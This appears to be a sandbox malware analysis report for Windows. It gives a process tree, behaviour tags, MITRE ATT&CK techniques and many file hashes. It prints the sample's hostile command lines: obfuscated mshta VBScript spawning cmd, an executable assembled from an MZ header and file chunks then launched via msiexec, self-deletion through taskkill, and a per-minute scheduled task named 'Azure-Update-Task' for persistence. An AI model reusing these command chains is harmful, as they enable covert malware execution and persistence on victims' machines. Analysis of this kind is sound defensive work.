C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRIpT: ClosE(CReateobjECT("WscRipT.SHeLl" ).rUn ( "cmD.EXE /q /r tYpe ""C:\Users\Admin\AppData\Local\Temp\C3AE.exe"" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd & iF """"=="""" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\C3AE.exe"" ) do taskkill /iM ""%~nXN"" -f " ,0 ,TrUE) )3⤵PID:9148
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r tYpe "C:\Users\Admin\AppData\Local\Temp\C3AE.exe" >MXb89OH1.EXE&& StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd&iF ""=="" for %N In ( "C:\Users\Admin\AppData\Local\Temp\C3AE.exe") do taskkill /iM "%~nXN" -f4⤵PID:8968
-
C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXEMXB89oH1.eXE /poMZbeSahrmSD~4GRjd5⤵PID:9528
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbSCRIpT: ClosE(CReateobjECT("WscRipT.SHeLl" ).rUn ( "cmD.EXE /q /r tYpe ""C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE"" >MXb89OH1.EXE && StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd & iF ""/poMZbeSahrmSD~4GRjd""=="""" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE"" ) do taskkill /iM ""%~nXN"" -f " ,0 ,TrUE) )6⤵PID:2984
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r tYpe "C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE" >MXb89OH1.EXE&& StarT MXB89oH1.eXE /poMZbeSahrmSD~4GRjd&iF "/poMZbeSahrmSD~4GRjd"=="" for %N In ( "C:\Users\Admin\AppData\Local\Temp\MXb89OH1.EXE") do taskkill /iM "%~nXN" -f7⤵PID:9688
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRipt: cLosE (CREateoBJEcT ("wscRiPt.shElL"). ruN ( "cMD /q /r EcHO | SeT /p = ""MZ"" > 5XGGA_QU.T & cOpY /Y /B 5XGGA_QU.t + 7AF4K.HlZ + 8Lma.CS3 + TBFC27.HKL + G2K6.CP+ P1JSBZHT.GQ+ KYb20.A3T YfYnG.AJ & StARt msiexec.exe -y .\YFYnG.AJ ", 0, TRue ) )6⤵PID:7792
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /r EcHO | SeT /p = "MZ" >5XGGA_QU.T & cOpY /Y /B 5XGGA_QU.t + 7AF4K.HlZ + 8Lma.CS3+ TBFC27.HKL+G2K6.CP+P1JSBZHT.GQ+ KYb20.A3T YfYnG.AJ & StARt msiexec.exe -y .\YFYnG.AJ7⤵PID:8700
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵PID:5088
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>5XGGA_QU.T"8⤵PID:9848
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\YFYnG.AJ8⤵PID:10216
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /iM "C3AE.exe" -f5⤵
- Kills process with taskkill
PID:6704
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\C729.exeC:\Users\Admin\AppData\Local\Temp\C729.exe2⤵PID:10128
-
-
C:\Program Files (x86)\O9r6hzlkh\_jxt0z7tbh.exe"C:\Program Files (x86)\O9r6hzlkh\_jxt0z7tbh.exe"2⤵PID:9020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵PID:8868
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
PID:4020 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:5276
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2804
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2644
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2636
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2448
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2412
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1852
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1372
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1352
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1192
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1108
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:1040 -
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵PID:8852
-
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵PID:9360
-
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵PID:5976
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:9732 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:7140
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"4⤵
- Creates scheduled task(s)
PID:6516
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵PID:9668
-
-
C:\Users\Admin\AppData\Roaming\wtateuwC:\Users\Admin\AppData\Roaming\wtateuw2⤵PID:692
-
-
C:\Users\Admin\AppData\Roaming\jaateuwC:\Users\Admin\AppData\Roaming\jaateuw2⤵PID:5332
-
-
C:\Users\Admin\AppData\Roaming\ajateuwC:\Users\Admin\AppData\Roaming\ajateuw2⤵PID:5568
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵
- Suspicious use of SetThreadContext
PID:6084 -
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe3⤵PID:5700
-
-
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵PID:9476
-
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵PID:9432
-
-
C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exeC:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe2⤵PID:8892
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe2⤵PID:9152
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:316
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09b2a8bc4f16cb.exeWed09b2a8bc4f16cb.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3908
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09abf83d9c2.exe"C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09abf83d9c2.exe" -u1⤵
- Executes dropped EXE
PID:3392
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09d27135e5a8b3b.exeWed09d27135e5a8b3b.exe1⤵
- Executes dropped EXE
PID:3196 -
C:\Users\Admin\AppData\Local\Temp\is-515AS.tmp\Wed09d27135e5a8b3b.tmp"C:\Users\Admin\AppData\Local\Temp\is-515AS.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$3014A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09d27135e5a8b3b.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3724 -
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09d27135e5a8b3b.exe"C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09d27135e5a8b3b.exe" /SILENT3⤵
- Executes dropped EXE
PID:2840 -
C:\Users\Admin\AppData\Local\Temp\is-AKJLL.tmp\Wed09d27135e5a8b3b.tmp"C:\Users\Admin\AppData\Local\Temp\is-AKJLL.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$40252,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09d27135e5a8b3b.exe" /SILENT4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:4216 -
C:\Users\Admin\AppData\Local\Temp\is-VDMB4.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-VDMB4.tmp\postback.exe" ss15⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:3640
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0E656616\Wed09abf83d9c2.exeWed09abf83d9c2.exe1⤵
- Executes dropped EXE
PID:3168
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2328
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3216 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:2812
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4268
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5080
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6224 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
PID:6268
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵PID:6776
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5156
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4224
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:6784 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 7EFB9BBD187FF27DBC1D4BA970876DC3 C2⤵PID:9768
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9955E94FFE79699A67C23EA3977BC4282⤵
- Blocklisted process makes network request
PID:4288 -
C:\Windows\SysWOW64\taskkill.exe"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f3⤵
- Kills process with taskkill
PID:6060 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5748
-
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2E20CC61DCE61B3AF9F30DD8C055C547 E Global\MSI00002⤵PID:2260
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:9232
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
PID:9480
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7556
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5632 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:4992
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4448 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5892
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5884 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1524
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:4236 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:1660
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
- Checks whether UAC is enabled
PID:3640 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:3756
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:9684
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:8148
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:992
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2420
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: MapViewOfSection
PID:3900
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:64
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx -s AppXSvc1⤵PID:4808
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8708
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3992
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:8936
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:9608
-
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exeC:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe /update /peruser /childprocess1⤵PID:6900
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:7532
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:6516
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:356
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
2Scheduled Task
1Defense Evasion
Disabling Security Tools
1File and Directory Permissions Modification
1Install Root Certificate
1Modify Registry
5Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
af05a2ab843ad9b5fc1cbd080c935b68
SHA1af6a92f75ca457cdb5cbfc732b7d087063da476c
SHA256272fad52f0b598d1a3213f089c58aa61211080d00c5ae7ede8fc63460c4bfb99
SHA512ab0536f53e8882a96fc2664648e76bdd75c839167cf9a27a89279d71681074a4acd92a1bd526e9fcf58544dac24146585a21633a23d97e7166e57d003d5311cb
-
MD5
af05a2ab843ad9b5fc1cbd080c935b68
SHA1af6a92f75ca457cdb5cbfc732b7d087063da476c
SHA256272fad52f0b598d1a3213f089c58aa61211080d00c5ae7ede8fc63460c4bfb99
SHA512ab0536f53e8882a96fc2664648e76bdd75c839167cf9a27a89279d71681074a4acd92a1bd526e9fcf58544dac24146585a21633a23d97e7166e57d003d5311cb
-
MD5
e1000667141aa6f9dbd8a9fe28861c6f
SHA1e3477db64ed6aa3c78344df36fa3262743bdab78
SHA25633a4ff8643ed46c085fdef751042a95718f33ccca3783bf43926af97daf4ee72
SHA512feff359a10bb377cd28755cd19e320baba5eb89f5480f1ed208229018d772e2b5693f35c0a099cc246d4b1ff96525fd046155e47ba76d4d802d5ca76a2844ea1
-
MD5
199dd8b65aa03e11f7eb6346506d3fd2
SHA1a04261608dabc8d394dfea558fcaeb216f6335ea
SHA2566d5f838b8826f5fcfc939db18f02b7703b37f9ecab111bda1aeca6030dd3aa13
SHA5120d28ba3232fac0caccc63c0b287ddd81bbc8493d8ec6d90b74f6a3d490903efb2e561cb62e6c9bae94f3bf81d6b298f72c02475f13b775312541ea579e2c4228
-
MD5
199dd8b65aa03e11f7eb6346506d3fd2
SHA1a04261608dabc8d394dfea558fcaeb216f6335ea
SHA2566d5f838b8826f5fcfc939db18f02b7703b37f9ecab111bda1aeca6030dd3aa13
SHA5120d28ba3232fac0caccc63c0b287ddd81bbc8493d8ec6d90b74f6a3d490903efb2e561cb62e6c9bae94f3bf81d6b298f72c02475f13b775312541ea579e2c4228
-
MD5
199dd8b65aa03e11f7eb6346506d3fd2
SHA1a04261608dabc8d394dfea558fcaeb216f6335ea
SHA2566d5f838b8826f5fcfc939db18f02b7703b37f9ecab111bda1aeca6030dd3aa13
SHA5120d28ba3232fac0caccc63c0b287ddd81bbc8493d8ec6d90b74f6a3d490903efb2e561cb62e6c9bae94f3bf81d6b298f72c02475f13b775312541ea579e2c4228
-
MD5
b5cfd3a9dc9e645e24c79991bca60460
SHA10d6bcdca2121d279bbe87c66cab515ac2478f555
SHA256852bffb94dbd3ed18ac11311b701ee80400209a19b3660b544146b41fa3b9768
SHA51255861773c758e5f3cc7440d012d820892f7b9155b542baeab940a8c80fd50ffd1001fca6f9f9dae7eca3ae53919eba795aca53d5bb3aaaf29a111acd016d24e6
-
MD5
b5cfd3a9dc9e645e24c79991bca60460
SHA10d6bcdca2121d279bbe87c66cab515ac2478f555
SHA256852bffb94dbd3ed18ac11311b701ee80400209a19b3660b544146b41fa3b9768
SHA51255861773c758e5f3cc7440d012d820892f7b9155b542baeab940a8c80fd50ffd1001fca6f9f9dae7eca3ae53919eba795aca53d5bb3aaaf29a111acd016d24e6
-
MD5
c4d0ec0c74d01acc7135e8045630b182
SHA1d954fa19b63df6062c013093ed22f8dc5218c48b
SHA2568d3586126ec20da9b63930b9995d9ad9826540a71fb958431b73ff48ff6b18e2
SHA5127cc8d2d033447eed31a1ccab040a4b52803f483d7957c488ad2165db4a308b5cf84f8e2420717436bb146e6e5d33b5d65a53b2381e3caec14b092562b940a9ed
-
MD5
c4d0ec0c74d01acc7135e8045630b182
SHA1d954fa19b63df6062c013093ed22f8dc5218c48b
SHA2568d3586126ec20da9b63930b9995d9ad9826540a71fb958431b73ff48ff6b18e2
SHA5127cc8d2d033447eed31a1ccab040a4b52803f483d7957c488ad2165db4a308b5cf84f8e2420717436bb146e6e5d33b5d65a53b2381e3caec14b092562b940a9ed
-
MD5
83be628244555ddba5d7ab7252a10898
SHA17a8f6875211737c844fdd14ba9999e9da672de20
SHA256e86ad9f9c576959b71ef725aaf7d74c0cf19316e1afbda61a8060d130e98fb3f
SHA5120c09cce580cd0403191a3944f37688c079d79a21dccb014ac748620835eac542a5327a4e325a3dab0cd6c3bd0db6cb523f51bd05b027596e0b8199d0503b78e2
-
MD5
83be628244555ddba5d7ab7252a10898
SHA17a8f6875211737c844fdd14ba9999e9da672de20
SHA256e86ad9f9c576959b71ef725aaf7d74c0cf19316e1afbda61a8060d130e98fb3f
SHA5120c09cce580cd0403191a3944f37688c079d79a21dccb014ac748620835eac542a5327a4e325a3dab0cd6c3bd0db6cb523f51bd05b027596e0b8199d0503b78e2
-
MD5
83be628244555ddba5d7ab7252a10898
SHA17a8f6875211737c844fdd14ba9999e9da672de20
SHA256e86ad9f9c576959b71ef725aaf7d74c0cf19316e1afbda61a8060d130e98fb3f
SHA5120c09cce580cd0403191a3944f37688c079d79a21dccb014ac748620835eac542a5327a4e325a3dab0cd6c3bd0db6cb523f51bd05b027596e0b8199d0503b78e2
-
MD5
6843ec0e740bdad4d0ba1dbe6e3a1610
SHA19666f20f23ecd7b0f90e057c602cc4413a52d5a3
SHA2564bb1e9ad4974b57a1364463ca28935d024a217791069dd88bedccca5eaad271a
SHA512112a327b9e5f2c049177b2f237f5672e12b438e6d620411c7c50d945a8a3d96ec293d85a50392f62651cdf04a9f68d13d542b1626fb81b768eb342077409d6d3
-
MD5
6843ec0e740bdad4d0ba1dbe6e3a1610
SHA19666f20f23ecd7b0f90e057c602cc4413a52d5a3
SHA2564bb1e9ad4974b57a1364463ca28935d024a217791069dd88bedccca5eaad271a
SHA512112a327b9e5f2c049177b2f237f5672e12b438e6d620411c7c50d945a8a3d96ec293d85a50392f62651cdf04a9f68d13d542b1626fb81b768eb342077409d6d3
-
MD5
03137e005bdf813088f651d5b2b53e5d
SHA10aa1fb7e5fc80bed261c805e15ee4e3709564258
SHA256258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd
SHA51223bbb89fe88264538461c0eae1437344e9823e245d00f0527424b95d4ca54054c8b411db3c066664617e0df69d1468ff10385841a5f1869a0e480a92abffdddd
-
MD5
03137e005bdf813088f651d5b2b53e5d
SHA10aa1fb7e5fc80bed261c805e15ee4e3709564258
SHA256258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd
SHA51223bbb89fe88264538461c0eae1437344e9823e245d00f0527424b95d4ca54054c8b411db3c066664617e0df69d1468ff10385841a5f1869a0e480a92abffdddd
-
MD5
03137e005bdf813088f651d5b2b53e5d
SHA10aa1fb7e5fc80bed261c805e15ee4e3709564258
SHA256258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd
SHA51223bbb89fe88264538461c0eae1437344e9823e245d00f0527424b95d4ca54054c8b411db3c066664617e0df69d1468ff10385841a5f1869a0e480a92abffdddd
-
MD5
94d45a7ff853b3c5d3d441cf87a71688
SHA13327a1929c68a160ef6287277d4cff5747d7bb91
SHA256172362b2f1f5dca51f1520fc186c1e67c7002f924420c5828b90e099e96b0476
SHA51214d60e3dec00bb95d1ac35b85c4a63aef3f0157a783c79284b874691b14fc73480f34fc95e09a1e4f9a830ed73addbccb21fe99e5a8b7f3c9f6300ae21cca88f
-
MD5
94d45a7ff853b3c5d3d441cf87a71688
SHA13327a1929c68a160ef6287277d4cff5747d7bb91
SHA256172362b2f1f5dca51f1520fc186c1e67c7002f924420c5828b90e099e96b0476
SHA51214d60e3dec00bb95d1ac35b85c4a63aef3f0157a783c79284b874691b14fc73480f34fc95e09a1e4f9a830ed73addbccb21fe99e5a8b7f3c9f6300ae21cca88f
-
MD5
1c80f27a97ac4ce5c1c91705e0921e5a
SHA123b8834a95a978b881f67440ceef1046d3172dd1
SHA2565f3d434aa99f8e88b605495e49588a87fd0aacd47092f149ff795ae983b81ae1
